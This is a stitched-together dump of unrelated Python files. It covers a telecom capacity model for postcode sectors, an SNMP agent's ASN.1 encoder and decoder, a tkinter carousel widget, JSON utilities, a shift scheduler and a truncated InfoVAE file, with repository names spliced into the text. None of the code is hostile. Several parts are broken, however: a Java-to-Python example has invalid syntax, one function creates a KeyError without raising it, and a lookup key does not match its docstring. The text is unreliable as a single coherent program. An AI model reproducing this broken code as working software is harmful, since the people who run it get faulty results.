Assessment Model """ from collections import defaultdict from itertools import tee class NetworkManager(object): """Model controller class. Represents lower level statistical units (postcode sectors) nested within upper level statistical units (local area districts), with all affiliated assets, capacities and clutter types. Parameters ---------- lads: :obj:`list` of :obj:`dict` List of local area districts * id: :obj:`int` Unique ID * name: :obj:`str` Name of the LAD pcd_sectors: :obj:`list` of :obj:`dict` List of postcode sectors (pcd) * id: :obj:`str` Postcode name * lad_id: :obj:`int` Unique ID * population: :obj:`int` Number of inhabitants * area: :obj:`float` Areas size in square kilometers (km²) * user_throughput: :obj:`int` Per user monthly data demand in gigabytes (GB) assets: :obj:`list` of :obj:`dict` List of assets * pcd_sector: :obj:`str` Code of the postcode sector * site_ngr: :obj:`int` Unique site reference number * technology: :obj:`str` Abbreviation of the asset technology (LTE, 5G etc.) * frequency: :obj:`str` Spectral frequency(s) the asset operates at (800, 2600, ..) * type: :obj:`str` The type of cell site (macrocell site, small cell site...) * build_date: :obj:`int` Build year of the asset capacity_lookup_table: dict Dictionary that represents the clutter/asset type, spectrum frequency and channel bandwidth, and the consequential cellular capacity provided for different asset densities. * key: :obj:`tuple` * 0: :obj:`str` Area type ('urban', 'suburban' or 'rural') or asset type ('small_cells') * 1: :obj:`str` Frequency of the asset configuration (800, 2600, ..) * 2: :obj:`str` Bandwith of the asset configuration (10, 40, ..) 
* 3: :obj:`str` Technology generation (4G, 5G) * value: :obj:`list` of :obj:`tuple` * 0: :obj:`int` Site asset density per square kilometer (sites per km²) * 1: :obj:`int` Mean Cell Edge capacity in Mbps per square kilometer (Mbps/km²) clutter_lookup: list of tuples Each element represents the settlement definitions for urban, suburban and rural by population density in square kilometers (persons per km²) * 0: :obj:`int` Population density in persons per km². * 1: :obj:`string` Settlement type (urban, suburban and rural) simulation_parameters: dict Contains all simulation parameters, set in the run script. * market_share: :obj:`int` Percentage market share of the modelled hypothetical operator. * annual_budget: :obj:`int` Annual budget to spend. * service_obligation_capacity: :obj:`int` Required service obligation. * busy_hour_traffic_percentage: :obj:`int` Percentage of daily traffic taking place in the busy hour. * coverage_threshold: :obj:`int` The threshold we wish to measure the served population against. * penetration: :obj:`int` The penetration of users with smartphone and data access. * channel_bandwidth: :obj:`int` Carrier bandwidth by frequency. * macro_sectors: :obj:`int` Number of sectors per macrocell. * small-cell_sectors: :obj:`int` Number of sectors per small cell. * mast_height: :obj:`int` Mast height for the sites being assessed. """ def __init__(self, lads, pcd_sectors, assets, capacity_lookup_table, clutter_lookup, simulation_parameters): self.lads = {} self.postcode_sectors = {} for lad_data in lads: lad_id = lad_data["id"] self.lads[lad_id] = LAD(lad_data, simulation_parameters) assets_by_pcd = defaultdict(list) for asset in assets: assets_by_pcd[asset['pcd_sector']].append(asset) for pcd_sector_data in pcd_sectors: try: lad_id = pcd_sector_data["lad_id"] pcd_sector_id = pcd_sector_data["id"] assets = assets_by_pcd[pcd_sector_id] pcd_sector = PostcodeSector(pcd_sector_data, assets, capacity_lookup_table, clutter_lookup, simulation_parameters) self.postcode_sectors[pcd_sector_id] = pcd_sector lad_containing_pcd_sector = self.lads[lad_id] lad_containing_pcd_sector.add_pcd_sector(pcd_sector) except: print('could not create object for {}'.format(pcd_sector_data["id"])) pass class LAD(object): """Local area district - Higher level statistical unit. Represents an area to be modelled. Contains data for demand characterisation and assets for supply assessment. Arguments --------- data: dict Metadata and info for the LAD * id: :obj:`int` Unique ID * name: :obj:`str` Name of the LAD simulation_parameters: dict Contains all simulation parameters, set in the run script. * market_share: :obj:`int` Percentage market share of the modelled hypothetical operator. * annual_budget: :obj:`int` Annual budget to spend. * service_obligation_capacity: :obj:`int` Required service obligation. * busy_hour_traffic_percentage: :obj:`int` Percentage of daily traffic taking place in the busy hour. * coverage_threshold: :obj:`int` The threshold we wish to measure the served population against. * penetration: :obj:`int` The penetration of users with smartphone and data access. * channel_bandwidth: :obj:`int` Carrier bandwidth by frequency. * macro_sectors: :obj:`int` Number of sectors per macrocell. * small-cell_sectors: :obj:`int` Number of sectors per small cell. * mast_height: :obj:`int` Mast height for the sites being assessed. 
""" def __init__(self, data, simulation_parameters): self.id = data["id"] self.name = data["name"] self._pcd_sectors = {} def __repr__(self): return "".format(self.id, self.name) @property def population(self): return sum([ pcd_sector.population for pcd_sector in self._pcd_sectors.values()]) @property def area(self): return sum([ pcd_sector.area for pcd_sector in self._pcd_sectors.values()]) @property def population_density(self): total_area = sum([ pcd_sector.area for pcd_sector in self._pcd_sectors.values()]) if total_area == 0: return 0 else: return self.population / total_area def add_pcd_sector(self, pcd_sector): self._pcd_sectors[pcd_sector.id] = pcd_sector def demand(self): """Return the mean demand (Mbps km²) from all nested postcode sectors. """ if not self._pcd_sectors: return 0 summed_demand = sum( pcd_sector.demand * pcd_sector.area for pcd_sector in self._pcd_sectors.values() ) summed_area = sum( pcd_sector.area for pcd_sector in self._pcd_sectors.values() ) return summed_demand / summed_area def capacity(self): """Return the mean capacity (Mbps km²) for all nested postcode sectors. """ if not self._pcd_sectors: return 0 summed_capacity = sum([ pcd_sector.capacity for pcd_sector in self._pcd_sectors.values()]) return summed_capacity / len(self._pcd_sectors) def coverage(self, simulation_parameters): """Return proportion of population with coverage over a threshold (e.g. 10 Mbps). """ if not self._pcd_sectors: return 0 threshold = simulation_parameters['coverage_threshold'] population_with_coverage = sum([ pcd_sector.population for pcd_sector in self._pcd_sectors.values() if pcd_sector.capacity >= threshold]) total_pop = sum([ pcd_sector.population for pcd_sector in self._pcd_sectors.values()]) return float(population_with_coverage) / total_pop class PostcodeSector(object): """Postcode Sector - Lower level statistical unit. Represents an area to be modelled. Contains data for demand characterisation and assets for supply assessment. Arguments --------- data: dict Metadata and info for the LAD * id: :obj:`int` Unique ID. * lad_id: :obj:`int` The Local Authority District which this area is within. * population: :obj:`int` Number of inhabitants. * area: :obj:`int` Geographic area (km²). * user_throughput: :obj:`int` Monthly user data consumption (GB). * population: :obj:`int` Number of inhabitants. * area: :obj:`int` Geographic area (km²). assets: :obj:`list` of :obj:`dict` List of assets * pcd_sector: :obj:`str` Code of the postcode sector * site_ngr: :obj:`int` Unique site reference number * technology: :obj:`str` Abbreviation of the asset technology (LTE, 5G etc.) * frequency: :obj:`str` Spectral frequency(s) the asset operates at (800, 2600, ..) * type: :obj:`str` The type of cell site (macrocell site, small cell site...) * build_date: :obj:`int` Build year of the asset capacity_lookup_table: dict Dictionary that represents the clutter/asset type, spectrum frequency and channel bandwidth, and the consequential cellular capacity provided for different asset densities. * key: :obj:`tuple` * 0: :obj:`str` Area type ('urban', 'suburban' or 'rural') or asset type ('small_cells') * 1: :obj:`str` Frequency of the asset configuration (800, 2600, ..) * 2: :obj:`str` Bandwith of the asset configuration (10, 40, ..) 
* 3: :obj:`str` Technology generation (4G, 5G) * value: :obj:`list` of :obj:`tuple` * 0: :obj:`int` Site asset density per square kilometer (sites per km²) * 1: :obj:`int` Mean Cell Edge capacity in Mbps per square kilometer (Mbps/km²) clutter_lookup: list of tuples Each element represents the settlement definitions for urban, suburban and rural by population density in square kilometers (persons per km²) * 0: :obj:`int` Population density in persons per km². * 1: :obj:`string` Settlement type (urban, suburban and rural) simulation_parameters: dict Contains all simulation parameters, set in the run script. * market_share: :obj:`int` Percentage market share of the modelled hypothetical operator. * busy_hour_traffic_percentage: :obj:`int` Percentage of daily traffic taking place in the busy hour. * penetration: :obj:`int` The penetration of users with smartphone and data access. """ def __init__(self, data, assets, capacity_lookup_table, clutter_lookup, simulation_parameters): self.id = data["id"] self.lad_id = data["lad_id"] self.population = data["population"] self.area = data["area_km2"] self.user_throughput = data["user_throughput"] self.penetration = simulation_parameters['penetration'] self.busy_hour_traffic = simulation_parameters['busy_hour_traffic_percentage'] self.overbooking_factor = simulation_parameters['overbooking_factor'] self.market_share = simulation_parameters['market_share'] self.user_demand = self._calculate_user_demand( self.user_throughput, simulation_parameters) self.demand_density = self.demand / self.area self._capacity_lookup_table = capacity_lookup_table self._clutter_lookup = clutter_lookup self.clutter_environment = lookup_clutter_geotype( self._clutter_lookup, self.population_density ) self.assets = assets self.site_density_macrocells = self._calculate_site_density_macrocells() self.site_density_small_cells = self._calculate_site_density_small_cells() self.capacity = ( self._macrocell_site_capacity(simulation_parameters) + self.small_cell_capacity(simulation_parameters) ) def __repr__(self): return "".format(self.id) @property def demand(self): """ Estimate total demand based on: - population - overbooking factor - smartphone penetration - market share - user demand - area E.g.:: 2000 population / 20 * (80% / 100) penetration * (25% / 100) market share = 20 users 20 users * 0.01 Mbps user demand = 0.2 total user throughput 0.2 Mbps total user throughput during the busy hour / 1 km² area = 0.2 Mbps/km² area demand """ users = ( (self.population / self.overbooking_factor) * (self.penetration / 100) * self.market_share ) user_throughput = users * self.user_demand demand_per_kmsq = user_throughput / self.area return demand_per_kmsq @property def population_density(self): """ Calculate population density for a specific population and area (persons per km²). """ return self.population / self.area def _calculate_site_density_macrocells(self): """ Calculate the macrocell site density (sites per km²). """ unique_sites = set() for asset in self.assets: if asset['type'] == 'macrocell_site': unique_sites.add(asset['site_ngr']) site_density = float(len(unique_sites)) / self.area return site_density def _calculate_site_density_small_cells(self): """ Calculate the small cell site density (sites per km²). 
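# --- Illustrative data shapes (sketch; all numbers are hypothetical) ---
# The docstrings above describe capacity_lookup_table and clutter_lookup only in
# prose, so the literals below are hypothetical examples of the expected shapes,
# not values used by the model.
# capacity_lookup_table: key = (clutter/asset type, frequency, bandwidth, generation),
# value = (site density in sites/km², capacity in Mbps/km²) pairs, ascending by density.
example_capacity_lookup_table = {
    ('urban', '800', '10', '4G'): [(0.5, 1), (2, 5), (4, 20)],
    ('small_cells', '3700', '25', '5G'): [(1, 10), (10, 100)],
}
# clutter_lookup: (population density upper bound in persons/km², settlement type),
# sorted ascending so a geotype can be picked by bracketing a density.
example_clutter_lookup = [(500, 'rural'), (2500, 'suburban'), (8000, 'urban')]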
""" small_cells = [] for asset in self.assets: if asset['type'] == 'small_cell': small_cells.append(asset) site_density = float(len(small_cells)) / self.area return site_density def _calculate_user_demand(self, user_throughput, simulation_parameters): """ Calculate Mb/second from GB/month supplied by throughput scenario. E.g. 2 GB per month * 1024 to find MB * 8 to covert bytes to bits * busy_hour_traffic = daily traffic taking place in the busy hour * 1/30 assuming 30 days per month * 1/3600 converting hours to seconds, = ~0.01 Mbps required per user """ busy_hour_traffic = simulation_parameters['busy_hour_traffic_percentage'] demand = user_throughput * 1024 * 8 * (busy_hour_traffic / 100) / 30 / 3600 if demand < 5: demand = 5 return demand def _macrocell_site_capacity(self, simulation_parameters): """ Find the macrocellular Radio Access Network capacity given the area assets and deployed frequency bands. """ capacity = 0 for frequency in [ '700', '800', '2600', '3500', '26000' ]: unique_sites = set() for asset in self.assets: for asset_frequency in asset['frequency']: if asset_frequency == frequency: unique_sites.add(asset['site_ngr']) site_density = float(len(unique_sites)) / self.area bandwidth = find_frequency_bandwidth(frequency, simulation_parameters) if frequency == '700' or frequency == '3500' or frequency == '26000': generation = '5G' else: generation = '4G' if site_density > 0: tech_capacity = lookup_capacity( self._capacity_lookup_table, self.clutter_environment, 'macro', frequency, bandwidth, generation, site_density, ) else: tech_capacity = 0 capacity += tech_capacity return capacity def small_cell_capacity(self, simulation_parameters): """ Find the small cell Radio Access Network capacity given the area assets and deployed frequency bands. """ capacity = 0 for frequency in ['3700', '26000']: num_small_cells = len([ asset for asset in self.assets if asset['type'] == "small_cell" ]) site_density = float(num_small_cells) / self.area bandwidth = find_frequency_bandwidth(frequency, simulation_parameters) if site_density > 0 : tech_capacity = lookup_capacity( self._capacity_lookup_table, self.clutter_environment, "micro", frequency, bandwidth, "5G", site_density, ) else: tech_capacity = 0 capacity += tech_capacity return capacity def find_frequency_bandwidth(frequency, simulation_parameters): """ Finds the correct bandwidth for a specific frequency from the simulation parameters. """ simulation_parameter = 'channel_bandwidth_{}'.format(frequency) if simulation_parameter not in simulation_parameters.keys(): KeyError('{} not specified in simulation_parameters'.format(frequency)) bandwidth = simulation_parameters[simulation_parameter] return bandwidth def pairwise(iterable): """ Return iterable of 2-tuples in a sliding window. >>> list(pairwise([1,2,3,4])) [(1,2),(2,3),(3,4)] """ a, b = tee(iterable) next(b, None) return zip(a, b) def lookup_clutter_geotype(clutter_lookup, population_density): """ Return geotype based on population density Parameters ---------- clutter_lookup : list A list of tuples sorted by population_density_upper_bound ascending (population_density_upper_bound, geotype). population_density : float The current population density requiring the lookup. 
""" highest_popd, highest_geotype = clutter_lookup[2] middle_popd, middle_geotype = clutter_lookup[1] lowest_popd, lowest_geotype = clutter_lookup[0] if population_density < middle_popd: return lowest_geotype elif population_density > highest_popd: return highest_geotype else: return middle_geotype def lookup_capacity(lookup_table, environment, cell_type, frequency, bandwidth, generation, site_density): """ Use lookup table to find capacity by clutter environment geotype, frequency, bandwidth, technology generation and site density. """ if (environment, cell_type, frequency, bandwidth, generation) not in lookup_table: raise KeyError("Combination %s not found in lookup table", (environment, cell_type, frequency, bandwidth, generation)) density_capacities = lookup_table[ (environment, cell_type, frequency, bandwidth, generation) ] lowest_density, lowest_capacity = density_capacities[0] if site_density < lowest_density: return 0 for a, b in pairwise(density_capacities): lower_density, lower_capacity = a upper_density, upper_capacity = b if lower_density <= site_density and site_density < upper_density: result = interpolate( lower_density, lower_capacity, upper_density, upper_capacity, site_density ) return result # If not caught between bounds return highest capacity highest_density, highest_capacity = density_capacities[-1] return highest_capacity def interpolate(x0, y0, x1, y1, x): """ Linear interpolation between two values. """ y = (y0 * (x1 - x) + y1 * (x - x0)) / (x1 - x0) return y def assemble_author_name(author: dict) -> str: # Even though the Unpaywall schema (https://unpaywall.org/data-format#doi-object) # says z_authors is exclusively a Crossref Contributor schema # https://github.com/CrossRef/rest-api-doc/blob/master/api_format.md#contributor # however, for DOI 10.1007/s00350-021-5862-6 the author schema contains no "given" # or "family" key but a "name" key instead. 
if "name" in author: return author["name"] name_components = [] if "given" in author: name_components.append(author["given"]) if "family" in author: name_components.append(author["family"]) if not name_components: name_components.append("unknown authors") return " ".join(name_components) from tkinter import Label, Button, StringVar from ..component import Component from ..extensions import GridHelper from .constants import Constants class TextCarousel(Component.with_extensions(GridHelper)): def __init__(self, container, get_data, on_change=(lambda carousel, increment_amount: None), amount_to_display=1, index=0, update_interval=None, styles=None): super().__init__(container, get_data=get_data, on_change=on_change, update_interval=update_interval, styles=styles) self.index = index styles = styles or {} self.styles["button"] = styles.get("button", {}) self.styles["label"] = styles.get("label", {}) self.values = self._get_data(self) self._displayed_text__vars = [StringVar() for i in range(amount_to_display)] self._update_displayed_text() def _update(self): self.values = self._get_data(self) self._update_displayed_text() self._set_button_states() def _render(self): self.children["back_button"] = None self.children["forward_button"] = None self.children["labels"] = [] row_index, column_index = 0, 0 self._apply_frame_stretch(columns=list(range(1, len(self._displayed_text__vars)+1)), rows=[0]) back_button = Button(self._frame, text=Constants.SYMBOLS["arrows"]["left"], command=lambda: self._handle_click(-1), **self.styles["button"]) self.children["back_button"] = back_button back_button.grid(row=row_index, column=column_index, sticky="nswe") column_index += 1 for text__var in self._displayed_text__vars: label = Label(self._frame, textvariable=text__var, **self.styles["label"]) self.children["labels"].append(label) label.grid(row=row_index, column=column_index, sticky="nswe") column_index += 1 forward_button = Button(self._frame, text=Constants.SYMBOLS["arrows"]["right"], command=lambda: self._handle_click(1), **self.styles["button"]) self.children["forward_button"] = forward_button forward_button.grid(row=row_index, column=column_index, sticky="nswe") self._set_button_states() def _handle_click(self, increment_amount): self.values = self._get_data(self) self.index += increment_amount self.index = max(0, self.index) self.index = min(len(self.values) - len(self._displayed_text__vars), self.index) self._on_change(self, increment_amount) if self.exists: self._update() def _set_button_states(self): self.children["back_button"].config(state="disabled" if self.index == 0 else "normal") self.children["forward_button"].config( state="disabled" if self.index + len(self._displayed_text__vars) == len(self.values) else "normal") def _update_displayed_text(self): for var_index, text__var in enumerate(self._displayed_text__vars): value = self.values[self.index + var_index] text__var.set(value) stjordanis/graph4nlp100-1000 ''' Created on Nov, 2018 @author: hugo ''' import json import numpy as np def dump_ndarray(data, path_to_file): try: with open(path_to_file, 'wb') as f: np.save(f, data) except Exception as e: raise e def load_ndarray(path_to_file): try: with open(path_to_file, 'rb') as f: data = np.load(f) except Exception as e: raise e return data def dump_ndjson(data, file): try: with open(file, 'w') as f: for each in data: f.write(json.dumps(each) + '\n') except Exception as e: raise e def load_ndjson(file, return_type='array'): if return_type == 'array': return load_ndjson_to_array(file) elif return_type == 
'dict': return load_ndjson_to_dict(file) else: raise RuntimeError('Unknown return_type: %s' % return_type) def dump_json(data, file, indent=None): try: with open(file, 'w') as f: json.dump(data, f, indent=indent) except Exception as e: raise e def load_json(file): try: with open(file, 'r') as f: data = json.load(f) except Exception as e: raise e return data chey/snmp-agent from __future__ import annotations from typing import List, Dict, Tuple, Any, Optional import ipaddress import asn1 # SNMP Version class VersionValue(object): def __init__(self, name: str, code: int): self.name = name self.code = code class VERSION(object): V1 = VersionValue(name='v1', code=0x00) V2C = VersionValue(name='v2c', code=0x01) # ASN.1 TAG class Tag(object): def __init__(self, name, code): self.name = name self.code = code def get_class(self) -> int: return self.code & 0xc0 def get_pc(self) -> int: return self.code & 0x20 def get_tag_number(self) -> int: return self.code & 0x1f class ASN1(object): BOOLEAN = Tag(name='BOOLEAN', code=0x01) INTEGER = Tag(name='INTEGER', code=0x02) OCTET_STRING = Tag(name='OCTET_STRING', code=0x04) NULL = Tag(name='NULL', code=0x05) OBJECT_IDENTIFIER = Tag(name='OBJECT_IDENTIFIER', code=0x06) SEQUENCE = Tag(name='SEQUENCE', code=0x30) IPADDRESS = Tag(name='IPADDRESS', code=0x40) COUNTER32 = Tag(name='COUNTER32', code=0x41) GAUGE32 = Tag(name='GAUGE32', code=0x42) TIME_TICKS = Tag(name='TIME_TICKS', code=0x43) COUNTER64 = Tag(name='COUNTER64', code=0x46) NO_SUCH_OBJECT = Tag(name='NO_SUCH_OBJECT', code=0x80) NO_SUCH_INSTANCE = Tag(name='NO_SUCH_INSTANCE', code=0x81) END_OF_MIB_VIEW = Tag(name='END_OF_MIB_VIEW', code=0x82) GET_REQUEST = Tag(name='GET_REQUEST', code=0xA0) GET_NEXT_REQUEST = Tag(name='GET_NEXT_REQUEST', code=0xA1) GET_RESPONSE = Tag(name='GET_RESPONSE', code=0xA2) SET_REQUEST = Tag(name='SET_REQUEST', code=0xA3) GET_BULK_REQUEST = Tag(name='GET_BULK_REQUEST', code=0xA5) class SNMPValue(object): def __init__(self): self.tag: Tag def get_class(self) -> int: return self.tag.get_class() def get_pc(self) -> int: return self.tag.get_pc() def get_tag_number(self) -> int: return self.tag.get_tag_number() class SNMPLeafValue(SNMPValue): def __init__(self): self.value: Any self.tag: Tag def encode(self) -> bytes: raise NotImplementedError class Integer(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.INTEGER def encode(self) -> bytes: return asn1.Encoder._encode_integer(self.value) class Boolean(SNMPLeafValue): def __init__(self, value: bool): self.value = value self.tag = ASN1.INTEGER def encode(self) -> bytes: return asn1.Encoder._encode_boolean(self.value) class OctetString(SNMPLeafValue): def __init__(self, value: str): self.value = value self.tag = ASN1.OCTET_STRING def encode(self) -> bytes: return asn1.Encoder._encode_octet_string(self.value) class Null(SNMPLeafValue): def __init__(self): self.value = None self.tag = ASN1.NULL def encode(self) -> bytes: return asn1.Encoder._encode_null() class ObjectIdentifier(SNMPLeafValue): def __init__(self, value: str): self.value = value self.tag = ASN1.OBJECT_IDENTIFIER def encode(self) -> bytes: return asn1.Encoder()._encode_object_identifier(self.value) class IPAddress(SNMPLeafValue): def __init__(self, value: str): self.value = value self.tag = ASN1.IPADDRESS def encode(self) -> bytes: return asn1.Encoder._encode_integer(int(ipaddress.IPv4Address(self.value))) class Counter32(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.COUNTER32 def encode(self) -> bytes: 
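        # Counter32 uses the application tag 0x41, but its payload is a plain
        # ASN.1 integer; Encoder.write() further below emits the tag and length
        # itself, so encode() only returns the raw value bytes.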
return asn1.Encoder._encode_integer(self.value) class Gauge32(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.GAUGE32 def encode(self) -> bytes: return asn1.Encoder._encode_integer(self.value) class TimeTicks(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.TIME_TICKS def encode(self) -> bytes: return asn1.Encoder._encode_integer(self.value) class Counter64(SNMPLeafValue): def __init__(self, value: int): self.value = value self.tag = ASN1.COUNTER64 def encode(self) -> bytes: return asn1.Encoder._encode_integer(self.value) class NoSuchObject(SNMPLeafValue): def __init__(self): self.value = None self.tag = ASN1.NO_SUCH_OBJECT def encode(self) -> bytes: return b'' class NoSuchInstance(SNMPLeafValue): def __init__(self): self.value = None self.tag = ASN1.NO_SUCH_INSTANCE def encode(self) -> bytes: return b'' class EndOfMibView(SNMPLeafValue): def __init__(self): self.value = None self.tag = ASN1.END_OF_MIB_VIEW def encode(self) -> bytes: return b'' class SNMPConstructedValue(SNMPValue): pass class Sequence(SNMPConstructedValue): def __init__(self): self.tag = ASN1.SEQUENCE class SnmpContext(SNMPConstructedValue): pass class SnmpGetContext(SnmpContext): def __init__(self): self.tag = ASN1.GET_REQUEST class SnmpGetNextContext(SnmpContext): def __init__(self): self.tag = ASN1.GET_NEXT_REQUEST class SnmpGetBulkContext(SnmpContext): def __init__(self): self.tag = ASN1.GET_BULK_REQUEST class SnmpGetResponseContext(SnmpContext): def __init__(self): self.tag = ASN1.GET_RESPONSE class Encoder(object): def __init__(self): self._encoder = asn1.Encoder() self._encoder.start() def enter(self, value: SNMPConstructedValue): self._encoder.enter(cls=value.get_class(), nr=value.get_tag_number()) def leave(self): self._encoder.leave() def write(self, value: SNMPLeafValue): self._encoder._emit_tag(cls=value.get_class(), typ=value.get_pc(), nr=value.get_tag_number()) value_bytes = value.encode() self._encoder._emit_length(len(value_bytes)) self._encoder._emit(value_bytes) def output(self) -> bytes: return self._encoder.output() def encode_response(response: SNMPResponse) -> bytes: encoder = Encoder() encoder.enter(Sequence()) encoder.write(Integer(response.version.code)) encoder.write(OctetString(response.community)) encoder.enter(response.context) encoder.write(Integer(response.request_id)) encoder.write(Integer(response.error_status)) encoder.write(Integer(response.error_index)) encoder.enter(Sequence()) for variable_binding in response.variable_bindings: encoder.enter(Sequence()) encoder.write(ObjectIdentifier(variable_binding.oid)) encoder.write(variable_binding.value) encoder.leave() encoder.leave() encoder.leave() encoder.leave() return encoder.output() class Decoder(object): def __init__(self, data: bytes): self._decoder = asn1.Decoder() self._decoder.start(data=data) def enter(self): self._decoder.enter() def read(self) -> Tuple[Any, Any]: # TODO: Look into response type warning return self._decoder.read() # (asn1.Tag, value) def peek(self) -> asn1.Tag: return self._decoder.peek() def eof(self) -> bool: return self._decoder.eof() def leave(self): self._decoder.leave() def decode_request(data: bytes) -> SNMPRequest: decoder = Decoder(data=data) # Get version and community decoder.enter() _, _value = decoder.read() version_code: int = _value if VERSION.V1.code == version_code: version = VERSION.V1 elif VERSION.V2C.code == version_code: version = VERSION.V2C else: raise NotImplementedError(f"SNMP Version code '{version_code}' is not 
implemented") _, _value = decoder.read() community = _value.decode() # Get pdu_type, request_id, non_repeaters and max_repetitions _tag = decoder.peek() _pdu_type_code = _tag.cls | _tag.typ | _tag.nr if ASN1.GET_REQUEST.code == _pdu_type_code: context = SnmpGetContext() elif ASN1.GET_NEXT_REQUEST.code == _pdu_type_code: context = SnmpGetNextContext() elif ASN1.GET_BULK_REQUEST.code == _pdu_type_code: context = SnmpGetBulkContext() else: raise NotImplementedError(f"PDU-TYPE code '{_pdu_type_code}' is not implemented") decoder.enter() _, _value = decoder.read() request_id: int = _value non_repeaters: int max_repetitions: int if isinstance(context, SnmpGetBulkContext): _, _value = decoder.read() non_repeaters = _value _, _value = decoder.read() max_repetitions = _value else: _, _ = decoder.read() _, _ = decoder.read() non_repeaters = 0 max_repetitions = 0 # Get variable-bindings decoder.enter() variable_bindings = [] while not decoder.eof(): # Get oid, type and value decoder.enter() _, _value = decoder.read() oid: str = _value _, _ = decoder.read() variable_bindings.append(VariableBinding(oid=oid, value=Null())) decoder.leave() decoder.leave() decoder.leave() decoder.leave() return SNMPRequest( version=version, community=community, context=context, request_id=request_id, non_repeaters=non_repeaters, max_repetitions=max_repetitions, variable_bindings=variable_bindings) class SNMP(object): def __init__(self): pass def to_dict(self): dict_ = self._to_primitive(self) return dict_ def _to_primitive(self, value): if isinstance(value, dict): _dict = {} for k, v in value.items(): _dict[k] = self._to_primitive(v) return _dict elif isinstance(value, list): items = [] for item in value: items.append(self._to_primitive(item)) return items elif isinstance(value, (int, str, bool)) or value is None: return value else: _dict = {} for k, v in vars(value).items(): _dict[k] = self._to_primitive(v) return _dict class SNMPRequest(SNMP): def __init__(self, version: VersionValue, community: str, context: SnmpContext, request_id: int, variable_bindings: List[VariableBinding], non_repeaters: int = 0, max_repetitions: int = 0): self.version = version self.community = community self.context = context self.request_id = request_id self.non_repeaters = non_repeaters self.max_repetitions = max_repetitions self.variable_bindings = variable_bindings def create_response(self, variable_bindings: List[VariableBinding], error_status: int = 0, error_index: int = 0): return SNMPResponse( version=self.version, community=self.community, request_id=self.request_id, variable_bindings=variable_bindings, error_status=error_status, error_index=error_index) class SNMPResponse(SNMP): def __init__(self, version: VersionValue, community: str, request_id: int, variable_bindings: List[VariableBinding], error_status: int = 0, error_index: int = 0): self.version = version self.community = community self.context = SnmpGetResponseContext() self.request_id = request_id self.error_status = error_status self.error_index = error_index self.variable_bindings = variable_bindings class VariableBinding(SNMP): def __init__(self, oid: str, value: SNMPLeafValue): self.oid = oid.lstrip(".") self.value = value def encode(self): return self.value.encode() nicolageorge/idiomaticpythonjava-to-python/java_implement.py import jnettool.tools.elements.NetworkElement \ jnettool.tools.Routing \ jnettool.tools.RouteInspector ne = jnettool.tools.elements.NetworkElement('127.0.0.1') try: routing_table - ne.getRoutingTable() # fetch table except 
jnettool.tools.elements.MissingVar: # record table fault logging.exception('no routing table found') # undo partial changes ne.cleanup('rollback') else: num_routes = routing_table.getSize() # determine table size for RToffset in range(num_routes): route = routing_table.getRouteByIndex(RToffset) name = route.getName() # route name ipaddr = route.getIPAddr() # ip address print "{0} -> {1}".format(name, ipaddr) # format nicely finally: ne.cleanup('commit') ne.disconnect()import datetime import itertools import logging import random import gamla from shift_scheduler import schedule, time_utils _is_weekend = gamla.anyjuxt( time_utils.is_friday, time_utils.is_saturday, ) @gamla.curry def _availabilty(working_weekends, scheduling, shift, person): return not gamla.anymap(_is_weekend, shift) or person in working_weekends def _weekday_shifts(start_date): buffer = () current = start_date while True: if time_utils.is_sunday(current): buffer = () if time_utils.is_friday(current): yield buffer buffer = () buffer = (*buffer, current) current += datetime.timedelta(days=1) def _weekend_shifts(start_date): buffer = () current = start_date while True: if time_utils.is_friday(current): buffer = () if time_utils.is_sunday(current): yield buffer buffer = () buffer = (*buffer, current) current += datetime.timedelta(days=1) _days_to_weight = gamla.compose_left( gamla.map( gamla.ternary( _is_weekend, gamla.just(2), gamla.just(1), ), ), sum, ) def _weighted_shifts(scheduling): return gamla.compose_left( schedule.shifts_manned_by_person(scheduling), gamla.concat, _days_to_weight, ) def _run(working_weekends, not_working_weekends): everyone = working_weekends + not_working_weekends # Shuffle to avoid situations where people order consistently # makes some people get more shifts. random.shuffle(everyone) return gamla.reduce( schedule.assign_shift( everyone, _availabilty(working_weekends), lambda scheduling, shift: schedule.compare_by( [ _weighted_shifts(scheduling), ], ), ), {}, gamla.pipe( datetime.date(2020, 7, 26), # In small numbers it is better to allocate first the weekend shifts, # otherwise we might over-allocate people who do all shift kinds. gamla.juxt(_weekend_shifts, _weekday_shifts), gamla.mapcat(gamla.take(22)), ), ) _flatten_days = gamla.mapcat( gamla.compose_left( gamla.star( lambda person, shift: ( (person,), shift, ), ), gamla.star(itertools.product), ), ) _scheduling_to_text = gamla.compose_left( _flatten_days, gamla.map( gamla.compose_left( gamla.star( lambda person, date: (date.strftime("%Y-%m-%d %A"), person, "\n"), ), "\t".join, lambda s: s.expandtabs(25), ), ), gamla.sort, ) _print_justice = gamla.compose_left( _flatten_days, gamla.edges_to_graph, gamla.valmap( gamla.juxt( gamla.compose_left( _days_to_weight, gamla.wrap_str("weight: {}"), ), gamla.compose_left(gamla.count, gamla.wrap_str("total: {}")), gamla.compose_left( gamla.filter(_is_weekend), gamla.count, gamla.wrap_str("weekend: {}"), ), ), ), logging.info, ) def _write(): text = gamla.pipe( _run( [ "a", "b", "c", "d", "e", "f", "g", "h", ], [ "i", "j", ], ), gamla.side_effect(_print_justice), _scheduling_to_text, ) open("./oncall_rotation.txt", "w").writelines(text) _write() codewof/programming/content/en/less-than-6/solution.py def print_less_than_6(numbers): for num in numbers: if num < 6: print(num) import tensorflow as tf import numpy as np import src.utils as utils """ Implementation of InfoVAE https://arxiv.org/abs/1706.02262 """ def reparameterise(x, n, stddev): """ Model each output as bing guassian distributed. 
